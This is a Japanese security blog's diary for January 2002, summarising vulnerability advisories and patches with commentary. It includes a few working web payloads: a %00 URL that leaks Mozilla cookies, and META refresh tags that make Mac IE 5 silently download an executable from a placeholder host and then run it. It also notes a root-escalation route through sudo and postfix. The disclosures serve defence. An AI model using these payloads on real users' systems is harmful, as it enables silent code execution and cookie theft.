セキュリティホール memo - 2002.01

Last modified: Tue Apr 15 13:03:49 2003 +0900 (JST)


2002.01.31

MS02-001: 信頼するドメインが認証データ内の SID (セキュリティ ID) のドメイン メンバシップを確認しない
(Microsoft Product Security Notification Service, Thu, 31 Jan 2002 11:21:58 +0900)

 Windows NT 4.0 / 2000 に弱点。 ドメイン間で信頼関係を結んでいる場合に、 信頼する側のドメインが、信頼される側のドメインからやってくる認証データの SID が、ほんとうに信頼される側のドメインに存在するのか否かをチェックしない。 これを利用すると、攻撃者は信頼される側のドメインの認証データに任意の SID を挿入することにより、信頼する側のドメインの管理者権限を入手できるという。 ただし SID を挿入するには、Windows NT 4.0 なら特製の OS コンポーネントを独自に作成してインストールしておく必要があるし、Windows 2000 なら「SIDHistory」情報が含まれるファイルをバイナリエディットする必要がある。

 しかしなあ。そもそもドメイン間で「信頼関係を結ぶ」って時点でアレゲなわけで。 これに対抗するには patch に含まれる「SID フィルタリング機能」というものを有効にする必要があるようだが、こんなの使ったら負荷とトラフィックを増やすだけだし。 まあ、気にする人は使うんだろうが、……。

 patch (SID フィルタリング機能) は NT 4.0 SRP と Windows 2000 SRP1 に含まれているんだそうだ。

「.NET」対応のウイルスを徹底解析
(ZDNet, 2002年1月31日)

 「.NET Virus」W32.Donut の詳細。

SecurityFocus.com Newsletter #128 2002-1-14->2002-1-18
(BUGTRAQ-JP, Sat, 26 Jan 2002 21:18:37 +0900)

 SecurityFocus.com Newsletter 第 128 号日本語版 (テキスト)。

UNIX fixes
(various)

Debian
RedHat
  • [RHSA-2002:018-10] New rsync packages available

    2002-01-28: There was an error in the original bugfix patch for the security problem - the new rsync could fail under some circumstances. This has been fixed in a new build だそうだ。

Vine
TurboLinux

穴情報
(various)

 まともに調べてる暇がない。

Windows 2000 Security Rollup Package 1
(various)

 ウワサのブツ、ついに登場。 しかし、

2002.02.01 追記:

ISH Detection Tool
(SecuriTeam, Wed, 30 Jan 2002 06:24:16 +0900)

 ICMP Shell を発見するためのツールだそうです。

プライバシー擁護団体が州政府にPassport調査を申し入れ
(ZDNet, 2002年1月29日 02:13 PM)

 「各州に呼びかけたのは,米連邦政府レベルでは実現しなかったからだという」。子ブッシュだしねえ。 なんて言ってるそばから MSNゲームサイトでまたもPassportによる不具合 (ZDNet) とか出てますが。

通信傍受法の改正も?  サイバー犯罪条約批准の課題
(毎日, 2002-01-30)

 ♪迫る〜ショッカ〜〜地獄の軍団〜〜。 「世界の平和を守るため」と称して悪の限りをつくす、のはよくあることですね。 N とか見ればわかるように、平気で大嘘こいて監視システムつくる国ですし。


2002.01.30

追記

 2002.01.24 の ソニー、「バイオ」専用プログラムにセキュリティ・ホール に追記した。 Q & A が登場。 他社の CyberSupport では発生しない模様。

CGI Security Paper
(LAC, 2002.01.29)

rsync remote exploit
(various)

 rsync 2.5.1 以前に弱点。 変数の signed / unsigned をとりまぜて扱っている個所がいくつかあり、これを利用すると、remote から任意のコードを実行させることができてしまうという。 2.5.2 で fix されている。 patch:

UNIX fixes
(various)

TurboLinux
IRIX

EIMS と Myparty ウイルス (web フォーム経由でのウィルス送信の可能性)
(直接 mail, Wed, 30 Jan 2002 14:32:59 +0900)

 EIMS の .com フィルタが Myparty を通してしまう、という話から、 web フォームで「ご意見募集」などしているページで、 uuencode したウィルスを貼りつけると、フィルタされずにそのまま担当者まで届くという話に発展している。 確かに、uuencode をフィルタするメール送信 CGI なんてのは聞いたことがないので、多くの場合にはそういうことになるのだろう。 顧客からの質問だと思ってファイルを開くとドカ〜ン。 あらかじめそういう心構えをしていないと、ついうっかり開いてしまいかねなさそう。

 対策としては、uuencode フィルタを組み込む、んですかねえやっぱり。

 今泉さん情報ありがとうございます。

追記

 2002.01.29 の Remote Denial of Service Vulnerability in Snort IDS に追記した。 開発元からの公式発表登場。 また ISS 報告の日本語版が登場 (なみねこさん感謝)。

[memo:2786] CDE dtspcd 攻撃に関する実例紹介 (in NCA5 総会)
(memo ML, Tue, 29 Jan 2002 12:56:18 +0900)

 CERT Advisory CA-2002-01: CDEのサブプロセスコントロールサービスに付け込み可能な脆弱性が存在する 関連ですが、某組織に対する攻撃事例が紹介されていました。 わざわざ patch をあててくれるという点に注意が必要です。 心あたりのない patch 適用には気をつけましょう。

 というか、ちゃんと file integrity check しましょう。

BalckICE Defender for Workstation ver.2.9canJ の Windows XP での不具合について
(今週のSecurity Check [Windows編] 第55回, 2002年1月30日)

 BalckICE Defender for Workstation ver.2.9canJ は Windows XP に対応していないという話。2.9caq 版 (まだ英語版しかない) で XP に対応したそうだ。

セキュリティ対策に予想以上の遅れ——国内企業への調査結果から
(日経 IT Pro, 2002/01/30)

 「危ないのは分かっている。でも対策があまり進まない」、 まあそんなもんでしょう。こういうのは根っこからいじらないとダメですしねえ。 「危ないと思ったらできるだけ早く取り掛かる,そしてせっかく取り掛かるなら最大の効果があがるよう徹底することが,重要ではないだろうか」、それで売上が劇的に上がるんならみんな手をつけるでしょうけどね。 もうかってるのはアンチウィルスベンダーだけなのでは?

 アンケートですけど、 集計結果−ECサービス の「問15 具体的などのような対策を施していますか。(複数回答)」にある「データの暗号化」って SSL とかの意味なんですかね。 「データの暗号化」と「通信の暗号化」は分けてほしかったような。 前者がどのくらいされてるか興味あるんだが。 「web アプリケーションのセキュリティ監査」とかいう項目がないのも気になるなあ。

 集計結果−セキュリティ もなかなか。回答企業 (対象企業 2893 社 (どう見ても大手企業) で回収率 36.3%) の 13% が踏み台になった経験があるそうで。 きちんと対応している企業とそうでない企業と、2 極化しているのかな。

 集計結果−サーバーOS 、Windows NT すごく多いですねえ。 Windows 2000 への移行もなかなか進んでないようで。


2002.01.29

 ネタの増大に記述がついていけてません。

追記

 2002.01.23 の Macinosh IE file execuion vulerability に追記した。 藤井さん、石川さん、篠田さんによる検証結果を追記。

Remote Denial of Service Vulnerability in Snort IDS
(stalk ML, Tue, 29 Jan 2002 18:26:17 +0900)

 snort 1.8.3 (最新版) 以前に弱点。 ICMP echo / echo-reply パケットの取りあつかいに問題があり、 ICMP データが 5 バイトより小さい場合に crash してしまうという。 patch を適用するか、 最新の開発版ソースを CVS 経由で入手しインストールする。

 関連: 検知システム「Snort」にセキュリティ・ホール,DoS攻撃を受ける恐れあり (日経 IT Pro)。「バージョンアップ (中略) で回避できる」という表現は誤解を生むので、1.8.4 が出るまではやめたほうがいいと思うぞ。

 [stalk:01149] などによると初出は Snort Core Dump Vulnerability のようですね。ここには「Snort version 1.8 and prior」 と書いてありますが、core dump する事例の version 番号は Version 1.8.3 (Build 88) って書いてあるし。

2002.01.30 追記:

 もともとの記事は bugtraq の Snort core dumped だそうです ([stalk:01155])。 見逃してるし > 俺。

 開発元からの公式発表が登場している: Snort ICMP DoS is no big deal。 -d オプションつき、かつ ASCII モードでログ採取している場合 (どちらもデフォルトではない) にのみ発生するとされている。

 ISS 報告日本語版: snort IDS におけるリモートからのサービス不能攻撃の脆弱点。 (なみねこさん感謝)

RealPlayer にバッファーオーバーランのセキュリティホール
(直接 mail, Tue, 29 Jan 2002 11:59:26 +0900)

 詳細: Sentinel Chicken Networks Security Advisory #01: RealPlayerCUR 8 Buffer Overflow。 real media ファイルに記述されている文字列長と実際の文字列長が異なっているかどうかのチェックが抜けている模様。 英語版 RealPlayer 用の patch はあるが日本語版はまだ。

 やまねさん情報ありがとうございます。

IBM 32MB USBメモリー・キー(P/N: 22P5296/46P6768)をお使いのお客様へ重要なお知らせ
(直接 mail, Tue, 29 Jan 2002 14:16:32 +0900)

 IBM 32MB USB メモリー・キー (IO DATA の EasyDisk みたいなモノみたい、って順序が逆?) が、ブートセクタ感染型ウィルス Wyx (または Eek) に感染していた模様。 ただしメモリー・キーからはブートできないため、ウィルスが活性化されることはないという。

 S/N 2320000 以上で修正されているそうだ。 該当する S/N の製品を所有する場合は 駆除ツール を用いて削除する。 通常のアンチウィルスソフトでは検出できない場合があるそうだ。

 西村さん情報ありがとうございます。

吉本家のページ: 緊急情報・お詫び(2002/1/26)
(直接 mail, Sat, 26 Jan 2002 19:27:45 +0900)

 shu-oneline.org (アレゲなページですねえ……) から来たモノに素直に reply してしまった不幸な人のおはなし。 biglobe は高々 1000 通しか受信できないのか……。 吉本さん情報ありがとうございます。


2002.01.28

「ハードディスクのデータ消去を徹底してほしい」,中古オフィス機器販売大手が指摘
(日経 IT Pro, 2002.01.26)

 「中古オフィス機器販売大手テイクオフ」では、 『「中古パソコンからデータが流出した場合の責任は,あくまでパソコンを引き渡す企業・官庁側にある」旨の契約を結んでいる』、 のだそうで。ちゃんと消しましょう。

追記

 2001.12.27 の Authentication Gateway HOWTO に追記した。 日本語版の URL 追加。


2002.01.25

CERT Advisory CA-2002-02 Buffer Overflow in AOL ICQ
(CERT/CC, January 24, 2002)

 AIMに続き,ICQにもバッファオーバーフローの問題 の話。2001B Beta v5.18 Build #3659 (わかりにくいバージョン表記だなあ) より前のやつは全滅。Build 3659 以降に upgrade しませう。

UNIX fixes
(various)

TurboLinux
Vine Linux
RedHat
FreeBSD

2002.01.24

追記

 2002.01.23 の 謎のスキャン急増。ポート12345を狙うのは誰? に追記した。トレンドマイクロからのアナウンスと、関連記事へのリンク。

【特別企画】 サイバー犯罪条約と国内法整備の課題 〜ネットワーク犯罪抑制の切り札となり得るか!〜
(sugj-free, Thu, 24 Jan 2002 10:30:29 +0900)

 1984、あるいは未来世紀ブラジルな世界とひきかえてもいいのなら、 切り札になるのかも。 もうとっくに 1984 化してんじゃん、という意見もあるだろうが、e-gov/e-Japan でターボ湯切り全開かと。 「実情に即した適切な法的整備という面で、日本は明らかに1歩出遅れているのである」、本当にそうなのかなあ。

 未来世紀ブラジルを気に入っている人は、 バトル・オブ・ブラジル も読んでおきましょう。当時のスターログ (こればかりは日本版でなくてはならない) をあわせて読めるともっとおもしろいかと。

ソニー、「バイオ」専用プログラムにセキュリティ・ホール
(直接 mail, Thu, 24 Jan 2002 11:08:14 +0900)

 SONY の VAIO にプリインストールされている、SONY 独自のプログラム 「CyberSupport for VAIO」の 3.0, 3.1 に弱点。 これらに含まれるモジュールの何か (なんだろう) によって、web ページや HTML 形式の電子メール/添付ファイルを通じ、攻撃者が任意のプログラムを実行可能だという。 該当する VAIO の機種については、VAIO セキュリティ強化プログラムダウンロード のページから参照されたい。

 しかしなあ。きちんとアナウンスしているし郵送による patch 配布も用意している点などはすばらしいのだが、 どのソフトウェアモジュールに問題があるのかがよくわからない (README.TXT を読むとようやく CyberSupport という文字列が出てくる) とか、 SEC_UPD_OK.txt というテキストファイルのありなしでインストール状況を判断するとかいう点はちょっとなあ。もうちょっとなんとかならないのか。 更新後ファイルのサイズ・日付・情報くらいはほしいですよね。 「入れたつもりが」ってのがいちばん恐いから。 ほんとは MD5 とか SHA1 とかも示してほしいけど、Windows だしねえ。

 CyberSupport 自体はジャストシステムの製品のようで、他社 PC にも採用されているようです。 例: 東芝 DynaBook Satellite 1800 (CyberSupport 3.1 for TOSHIBA)、 日立 Prius Bシリーズ。 しかし、ジャストシステム自身には全く情報がありません。 OEM 専用製品なのかな。

 青木さん、匿名希望さん情報ありがとうございます。

 C:\Documents and Settings\k-suke\My Documents\work\CyberSupport\Security Patch\Installer for Patch CD\VAIO セキュリティ強化プログラム\Script Files\Setup.dbgですか。

2002.01.24 追記:

 発見者の高木さんから詳細が公開された: [memo:2730] CyberSupport for VAIO に任意コマンド実行の脆弱性。なんでもやり放題の ActiveX コントロールが存在していた、ということのようだ。となると、やはり心配なのは、東芝や日立の PC は ok なのか?! という点だろう (ダメな方に 100 クレジット)。

2002.01.25 追記:

 SONY プレスリリース: 「コンピューターのセキュリティに関する重要なお知らせ」 (info from slashdot.jp [VAIOのプリインストールプログラムに大穴])。

2002.01.30 追記:

 この問題に関するQ & A2-5 他社の「CyberSupport」でも同じ現象が発生するのですか? によると、今回のおはなしは SONY 製モジュールによるものであり、他社の CyberSupport では発生しないそうです ([memo:2745])。 この Q & A はたいへんすばらしいです。最初からほしかった……。

 ぜひとも、今回の対応と同一レベルで OS 部分についてもちゃんと情報を載せてもらいたいところなのですが、むつかしいでしょうかねえ。 OEM 部分 については OEM メーカがきちんとアナウンスする責任があると思うんですが。 「詳細は MS page 見て」ではまずいですよね。 IIS や UPnP みたいに「OEM メーカが独自にプリインストールしてました」なんてパターンもあるのですし。

2002.04.15 追記:

 高木さんによる詳細情報 (のつづき): [memo:3558] Re: CyberSupport for VAIO に任意コマンド実行の脆弱性

追記

 2002.01.23 の Macinosh IE file execuion vulerability に追記した。 森さんからの情報を追記。 既存のファイルだけでなく、任意のファイルを実行させるシナリオが紹介されている。


2002.01.23

「電子政府法案」今通常国会に提出へ 総務省
(毎日, 2002-01-22)

 「さあゲームのはじまりです」。 全ての自治体において (防衛) 体制が整っているとはとても思えず。 つくってもらおうと役所に行ったら「もうつくられてますけど」とか言われる可能性って低くないような気が。

Mozilla Cookie Exploit
(bugtraq, Tue, 22 Jan 2002 14:10:37 +0900)

 Mozilla 0.9.6 以前、Netscape 6.1 以前に弱点。 http://alive.znep.com%00www.passport.com/cgi-bin/cookies といった特殊な URL を利用することにより、%00以降のサイトの cookie を http://alive.znep.com/cgi-bin/cookies から読み出せてしまう。 ただし読み出せるのは .passport.com の cookie であり、 www.passport.com の cookie は読み出せない。

 Mozilla 0.9.7 以降、Netscape 6.2.1 以降では修正されているので、最新版に乗りかえること。

2002.01.24 追記:

 関連スレッド: Netscape/MozillaにCookie漏洩のセキュリティホール (slashdot.jp)

Macinosh IE file execuion vulerability
(bugtraq, Tue, 22 Jan 2002 20:02:47 +0900)

 MacOS 9.x 以前で IE 5.0 を使うと、悪意ある web ページ管理者は <META HTTP-EQUIV="refresh" CONTENT="1; URL=file:///Macintosh%20HD/ System%20Folder/Speakable%20Items/Put%20Computer%20To%20Sleep"> のようにして既知のパス名にあるファイルを起動できてしまうという指摘。

2002.01.24 追記:

 森さんから (情報ありがとうございます):

> MacOS 9.x 以前で IE 5.0 を使うと、悪意ある web ページ管理者は
><META HTTP-EQUIV="refresh" CONTENT="1; URL=file:///Macintosh%20HD/
> System%20Folder/Speakable%20Items/Put%20Computer%20To%20Sleep">
>のようにして既知のパス名にあるファイルを起動できてしまうという指摘。

IE5 Macでは
<META HTTP-EQUIV="refresh" CONTENT="1; URL=http://hoge.com/hoge.exe">
という記述で、hoge.exeというブラウザで開けないファイルを確認もなくダウンロー
ドしてしまうバグ?があります(わたしが自分で発見しましたが、既知のものかもし
れません)。そのときにはダウンロードマネージャのウインドウが開きますが、すで
にダウンロードマネージャのウインドウが開いていて、背後に隠れている場合、ユー
ザが全く知らないうちにダウンロードされます。

で、IEのデフォルトのままだと Desktop Folder にダウンロードですから、既知のパ
スの既知のファイルってことになりますね。
<META HTTP-EQUIV="refresh" CONTENT="1;
URL=file:///Macintosh%20HD/Desktop%20Folder/hoge.exe">
次のページのMETAで実行されてしまいます。

Mac版IE5って、その他にも直ってないバグがいくつもあって困りますね。
履歴を消しても、アドレスのオートコンプリートは消えないとか。Cookieのパスが
「/」になってしまうとか。

 まずいですねえ。

2002.01.29 追記:

 新たな情報:

 対応方法も記載されているので、MacOS 版 IE / iCab ユーザは上記リンクを読んでおこう。 (うぅ、検証する時間が取れない……)

謎のスキャン急増。ポート12345を狙うのは誰?
(ZDNet, 2002年1月23日 03:38 PM)

 patch がいかに適用されないかは CodeRed / Nimda が証明したはずだが……。

2002.01.25 追記:

 トレンドマイクロからのアナウンス: ウイルスバスターコーポレートエディション 脆弱性に関するお問い合わせについて (水野さん情報ありがとうございます)。 あと、12345 については 2000.03.02 の TrendMicro OfficeScan tmlisten.exe DoS あたりを参照するのがよろしいかと。


2002.01.22

Python for Windows Extensionsにプライバシ問題
(slashdot.jp, Tuesday January 22, @04:06PM)

 PythonScript 経由で local file を読めてしまう、ということなのかな。

ご利用者の皆様へ、本サイトのセキュリティ上のご報告とお詫び
(直接 mail, Tue, 22 Jan 2002 13:08:31 +0900)

 https://www.netsecurity.ne.jp/ に cross-site scripting 脆弱性があった模様。 直したそうですが、 Apache/1.3.11 (Unix) mod_ssl/2.5.1 OpenSSL/0.9.5a から Apache/1.3.22 (Unix) mod_ssl/2.8.5 OpenSSL/0.9.5a に変化してますね。1.3.11 なんてのを使っていたのが敗因? (なぜ OpenSSL は version up しないの?)

 座喜味さん情報ありがとうございます。

UNIX fixes
(various)

Debian GNU/Linux
RedHat
OpenBSD
TurboLinux

2002.01.21

iPlanet/NetscapeのWebサーバーにセキュリティ・ホール,“パスワード破り”が可能に
(日経 IT Pro, 2002年1月21日)

 iPlanet Web Server, Enterprise Edition / Netscape Enterprise 4.0 SP2,SP6 to 4.1 SP8 の問題の解説など。アカウントの brute-force attack もできたんですね。

[memo:2653] Re: spamのSubject「!広告!」
(memo ML, Mon, 14 Jan 2002 00:25:45 +0900)

 akira21++ for ladies には「ストーカー対策」として、エラーメールを MUA 側で作成して送る機能があるという話。通常版にもついていてヨサゲに聞こえるのだけど。

WebDAV / Proxy Interoperability
(webdav-jp ML, Sat, 12 Jan 2002 21:55:37 +0900)

 WebDAV に対する proxy server の対応状況。 逆にコロしたい場合にも参考になるでしょう。

UNIX fixes

OpenBSD
Debian GNU/Linux
FreeBSD

Kurt Seifried Security Advisory 003 (KSSA-003): Multiple windows file wiping utilities do not properly wipe data with NTFS file systems
(bugtraq, Mon, 21 Jan 2002 12:44:33 +0900)

 ファイルを痕跡すら残さずに安全に消去するユーティリティ、 BCWipe 1.x/2.x, Eraser 5.3, SecureClean v3 build-2.0, East-Tec Eraser 2000, PGP (International) 6.x/7.x の Windows 版を NTFS に対して適用した場合に問題。 NTFS の機能である alternate data stream に情報が格納されていた場合に、これが消去されないという。 Eraser 5.3 は唯一 alternate data stream にも対応しているが、 これですらファイル中の最後の alternate data stream 消去に失敗してしまうという。

 Eraser 5.3 については 告知と修正版 が登場している。

 また、このテのソフトのまとめが ファイル等を復元できないように削除するソフトウェア にある (info from slashdot.jp)。

【特集】ハニーポットを利用したネットワークの危機管理 〜おとりサーバで侵入者、攻撃者の手法を分析〜
(@IT, 2002.01.19)

 私自身を含め、honeypot で遊んでみたいと思ってる人は少なくないと思いますが、 IDS 以上に気合いの入った運用が必要になるでしょうしねえ。


2002.01.18

SecurityFocus.com Newsletter #127 2002-1-7->2002-1-11
(BUGTRAQ-JP, Thu, 17 Jan 2002 10:46:54 +0900)

 SecurityFocus.com Newsletter 第 127 号日本語版 (テキスト, 英語版)。

ツール類 (?)
(various)

穴情報
(various)

追記

 2002.01.15 の gzip 1.2.4 may crash when an input file name is too long (over 1020 characters) に追記した。 FreeBSD での状況に対するこがさんの発言を追記。

UNIX fixes
(various)

Debian GNU/Linux
FreeBSD
NetBSD
Vine Linux
RedHat

JP315056: ユニバーサル プラグ アンド プレイ サービスを使用するサービス拒否攻撃を防ぐ方法
(新着サポート技術情報, 2002.1月18日)

 ユニバーサル プラグ アンド プレイに含まれる未チェックのバッファによりシステムが侵害される (MS01-059) がらみの話。MS01-059 からは link されていないので注意。

 しかしよくわからんなあ。 「デバイスの説明 をネットワーク スコープに基づいてダウンロードするよう規制する」ではデフォルト値は「1- 同一のサブネットまたはプライベート アドレスに存在する場合」だと言っているのに、 「デバイスの説明をルーターのホップ数に基づいてダウンロードするよう規制する」 のデフォルト値は「最大 4 までのルーター ホップ数の範囲からのみデバイスの設定を検出」なのか?

 あ、もしかして、こういうことか?

  1. プライベートアドレスでない場合 (169.254.0.0/16 とか (笑)) はサブネット内のみ

  2. プライベートアドレスの場合はサブネットがどのように設定されていても「最大 4 までのルーター ホップ数の範囲」

出そうなもの (Microsoft 方面)
(直接 mail)

 どちらも、まだ get できないみたいです。

追記

 2002.01.17 の Security Issue with Sudo and Postfix に追記した。 こがさんからの情報を追記。


2002.01.17

[WSJ] Microsoft,「機能よりセキュリティ重視」に戦略転換
([memo:2709], Thu, 17 Jan 2002 18:17:34 +0900)

 ゲイツ氏、ついに目覚める? Windows が OpenBSD のようになる、と期待してもいいんだろうか。 (それは……ねえ)

2002.02.19 追記:

 ゲイツの新方針:「新機能よりセキュリティー」 (CNET)

Security Issue with Sudo and Postfix
(installer ML, Thu, 17 Jan 2002 15:30:50 +0900)

 sudo 1.6.0〜1.6.3p7 までに弱点。 postfix (に含まれる sendmail プログラム) がインストールされていると、攻撃者は sudo を経由して root 権限を得られる。

 これは sudo 1.6.0 以降において、管理者あてメールを root 権限で送るようになったことに起因する。これは user が、メールを送っている sudo を kill できないようにするためだ。しかし、ここで起動されるのが postfix に付属する sendmail プログラムだと、 攻撃者は自身が設定した環境変数 (MAIL_CONFIG や MAIL_DEBUG かなあ……) によって sendmail プログラムに影響を与えることができる。 また sudo は sendmail プログラムを実ユーザ id, 実行ユーザ id 共に 0 (= root) の状態で実行するため、呼ばれた側は、実は suid プログラムから呼ばれたこととはわからず、呼ばれ側 (= sendmail プログラム) で権限を落とすこともできない。 結果として、攻撃者はまんまと root 権限を得られる。

 この問題を起こす組みあわせは、今のところ postfix の sendmail プログラムだけだという。 また、root としてメールを送るのではなく一般ユーザ権限で送るようにするには、 sudo 1.6.5 以降で設定オプション --disable-root-mailer を使えばよい。 デフォルトで --disable-root-mailer になるべきだと私は思うが、そうなってはいない模様。 注意しましょう。

2002.01.18 追記:

 こがさんから (ありがとうございます):

今回の問題は、sudo が環境変数をほとんどクリアせずに、メイラが root 
権限で実行してしまうことにあります。

postfix 版の sendmail では、環境変数 MAIL_CONFIG と、設定での
debugger_command で簡単に任意のコマンドを root 権限で実行できてしまいます。

postfix 以外でどうなのかですが、Mandrake のアナウンスでは sendmail も
駄目なように書いてあります。しかし、sendmail で扱う環境変数 (直接扱う
のは HOSTALIASES と HOME だけ) では悪さできそうにありません。

なお、LD_LIBRARY_PATH のような危険な環境変数については、かなり早い段階
でクリアされる実装になっており、その後でしかコマンド (含むメイラ) は
実行されません。具体的な環境変数名は、1.6.3p7 では、

static struct env_table badenv_table[] = {
    { "IFS=", 4 },
    { "LOCALDOMAIN=", 12 },
    { "RES_OPTIONS=", 12 },
    { "HOSTALIASES=", 12 },
    { "LD_", 3 },
    { "_RLD", 4 },
#ifdef __hpux
    { "SHLIB_PATH=", 11 },
#endif /* __hpux */
#ifdef _AIX
    { "LIBPATH=", 8 },
#endif /* _AIX */
#ifdef HAVE_KERB4
    { "KRB_CONF", 8 },
#endif /* HAVE_KERB4 */
#ifdef HAVE_KERB5
    { "KRB5_CONFIG", 11 },
#endif /* HAVE_KERB5 */
    { "ENV=", 4 },
    { "BASH_ENV=", 9 },
    { (char *) NULL, 0 }
};

です。

2002.01.16

UNIX fixes
(various)

RedHat
SGI

警察文書PCごと流出 摘発少年や署員情報 中古ショップ販売 福岡市
(Everyday People, 2002年 1月 16日)

 いや〜こういう PC 欲しいですねえ。 いきなり cryptme とかに渡しちゃったりするとか。

 とか言ってるそばから、市販中古パソコンにデータ 診療明細書が外部流出、名古屋の学生購入 (中日新聞) なんてのも出てますし (前田さん情報感謝)。 「市販ソフトで復元したところ」 というのがポイントですね。FAT で del しただけって感じ?

 消し消し系の話は 米軍、国防総省等の規格に準拠したデータ抹消ソフトの強化版を新発売 〜パーソナルメディアが「ディスクシュレッダー・スーパー」を9月18日より出荷〜 のところにいくばくか書きましたのでそちらを。 BCWipe for UNIX 使ってみた人っているのかな。

UnPlug n' Pray
(Windows UPnP Vulnerability , Crypt-Gram January 15, 2002)

 ユニバーサル プラグ アンド プレイに含まれる未チェックのバッファによりシステムが侵害される (MS01-059) で一躍有名になった、Windows の Universal Plug and Play (UPnP) 機能を無効にするプログラム。 UPnP がどうしても必要な人を除いて、ぜひ実行しておこう。

 ……しかし、読み進んでいくとこんな記述が:

JAN 3, 2002: We have received preliminary reports of the UPnP service being silently re-enabled without the users' knowledge or permission. We hope that this is an innocent side-effect of background XP updates, but it is our position that users have the implicit right to decide how their computers operate, and what services they run.

Please keep an eye on this for a while by re-running UnPnP from time to time to check on the "disabled" status. If you find that UPnP has become silently re-enabled on your system, please drop a note to us at support@grc.com . If this behavior is confirmed, we will immediately enhance UnPnP to prevent this silent re-enabling. Our eMail system subscribers will then be notified of this enhancement.

 なんか、最近の Microsoft はこんなんばっかですなあ。 勝手に設定変えちゃいかん。

追記

 2002.01.15 の CERT Advisory CA-2002-01: CDEのサブプロセスコントロールサービスに付け込み可能な脆弱性が存在する に追記した。 LAC 邦訳版も登場。

「Passport のセキュリティに関する緊急情報」メールに関する最新情報
(Win セキュリティ虎の穴, 2002/01/15)

 その patch を適用しても、Internet Explorer Document.Open() Without Close() Cookie Stealing, File Reading, Site Spoofing Bug とかが残るんですけど。IE 5.01 SP2 ならだいじょうぶなんですけどねえ。 やっぱり IE 5.01 SP2 をもうちょっと維持しつづけたほうがいいと思うんですけど。


2002.01.15

AIMに続き,ICQにもバッファオーバーフローの問題
(ZDNet, 2002年1月15日)

 ICQ 2001b Beta v5.18 Build #3659 より前に弱点。 バッファオーバーフローが発生するため、DoS 攻撃の他、 remote から任意のコードを実行させることも可能であるという。 ICQ 2001b Beta v5.18 Build #3659 で fix されているそうだ。 ダウンロードページ から入手できる。

2002.01.16 追記:

 CERT/CC VN 出ました: Vulnerability Note VU#570167: ICQ contains a buffer overflow while processing Voice Video & Games feature requests

SPS Advisory 3 点
(BUGTRAQ-JP, Fri, 11 Jan 2002 00:59:47 +0900)

UNIX 方面 fix
(various)

Debian GNU/Linux

Debian GNU/Linux 2.2r5 released なんだそうです。カナダさん情報ありがとうございます。

RedHat

CERT Advisory CA-2002-01: CDEのサブプロセスコントロールサービスに付け込み可能な脆弱性が存在する
(CERT/CC, Tue, 15 Jan 2002 02:01:46 +0900)

 CERT Advisory CA-2001-31: CDEサブプロセスコントロールサービスにバッファオーバフローが存在する を狙ったスキャンと攻撃が増加しているという話題。 対 Solaris 用の exploit が出回っている模様。 ただし、狙われている CDE Subprocess Control Service (dtspcd) と同じ 6112/tcp を利用するゲームがあるそうで、6112/tcp が来るからといって attack だと思ってはいけないそうな。

 Solaris 用の patch はすでに出ているので適用すればよい。 その他の OS についても適用しておこう。

2002.01.16 追記:

 LAC 邦訳版も出てます。 原文 link 忘れてた: CERT Advisory CA-2002-01 Exploitation of Vulnerability in CDE Subprocess Control Service

追記

 2002.01.10 の Flashファイルに感染するウイルス出現,ただし危険度は低 に追記した。 ZDNet Security How-To から詳細な関連記事。

solution 3543: SMTP: welcome メッセージを disable にする。
(トレンドマイクロ, 2002/1/10)

 InterScan VirusWall のバナー出力を止める方法。

.NETがウイルス作者の標的に
(ZDNet, 2002年1月11日)

 from Microsoft: Information on the So-Called ".NET Virus" 。KB Q316827 はまだ出てないみたい。 関連: 「W32.Donutは.NETウイルスではない」とマイクロソフト (ZDNet エンタープライズ)。 終わりなき戦い、終わりなき索敵。

2002.01.16 追記:

 日本語版も出た: “.NET ウイルス” に関する情報

gzip 1.2.4 may crash when an input file name is too long (over 1020 characters)
(DSA 100, Sun, 13 Jan 2002 19:08:59 +0900)

 gzip 1.2.4 に弱点。長大な入力ファイル名によりバッファオーバーフローが発生する。 gzip による自動圧縮・伸張をサポートしている ftp サーバ (ex. wu-ftpd) において脆弱性が発生するとしている。 patch があるので適用する。 BUGTRAQ bugid 3712。 Debian fix: [SECURITY] [DSA 100-1] New gzip packages fix potential buffer overflow

 FreeBSD 方面を見てみたら、gnu/usr.bin/gzip/gzip.c 1.8 でそれっぽい fix が。1997 年って書いてあるぞ……。

2002.01.18 追記:

 こがさんが FreeBSD の状況に関して freebsd-security ML に投稿している。 zdiff や znew シェルスクリプトがちょっとマズゲの模様。

2002.03.15 追記:


2002.01.11

特定商取引に関する法律施行規則の一部を改正する省令
(INTERNET Watch, 2002.01.10)

 2002.02.01 から。 日本産業協会 (Netscape-Enterprise/2.01c) で違反メールを収集するということなので、 違反メールをみかけたらばんばん forward してあげよう。forward 先は meiwaku@nissankyo.jp だ。 ……ってちょっとまて、nissankyo.jp 側には web page ないじゃん。 ほんとに mail 届くのかなあ? 心配。 mesh.ad.jp が管理してるっぽいけど。

 関連: 「!広告!」をSubjectに表示義務 経産省がスパム対応で (ZDNet)、 経産省が迷惑メール対策 告発用窓口も設置 (毎日)、 広告メールには「!広告!」と表記せよ--経産省が義務付け (日経 BizTech)。 ほら、みんな「!」は「全角文字」だと思ってるぞ。それでいいのか経産省。

 しかし 経産省、SPAMはOKな省令を2/1より施行 (slashdot.jp) にあるように、「パブリックコメント募集」はアリバイづくりでしかなかった模様。 気に入らないな。 まあ、まともにやる奴ならそもそも「!広告!」なんてセンスのないコトはやらないのだろうが。 しょせん e-Japan というのはこんなもんなんでしょうねえ。ダメすぎ。

追記

 2002.01.10 の Flashファイルに感染するウイルス出現,ただし危険度は低 に追記した。 Macromedia のオフィシャル情報が登場。


2002.01.10

SecurityFocus.com Newsletter #126 2001-12-31->2002-1-4
(BUGTRAQ-JP, Thu, 10 Jan 2002 17:01:12 +0900)

 SecurityFocus.com Newsletter 第 126 号日本語版 (テキスト, 英語版)。

各種ツール
(various)

 これまた原則 link だけでごかんべん。

Flashファイルに感染するウイルス出現,ただし危険度は低
(日経 IT Pro, 2002.01.09)

 「ActionScriptはスタンドアロン版のムービーでのみサポートしており,プラグイン版ではサポートしていない」 のがポイントのようです。 web ブラウジングしている限りにおいては、問題はなさそう。 関連記事 マクロメディアの『Flash』ファイルを介した新ウイルス (CNET) では:

マクロメディアのサンタンジェリによると、同社はShockwave Flashファイルと各パソコンにインストールされているFlashプレーヤー間のファイルの関連付けを無効にする修正パッチを数日以内に発表する。さらに、次のバージョンではプレーヤーのセキュリティーホールを修復する予定だという。

 その「修復」がどの程度のものなのかが問題になるような。

 memo ML の [memo:2527] 「Shockw ave Flash 」を感染させるウイルス のスレッドにも情報があります。

2002.01.11 追記:

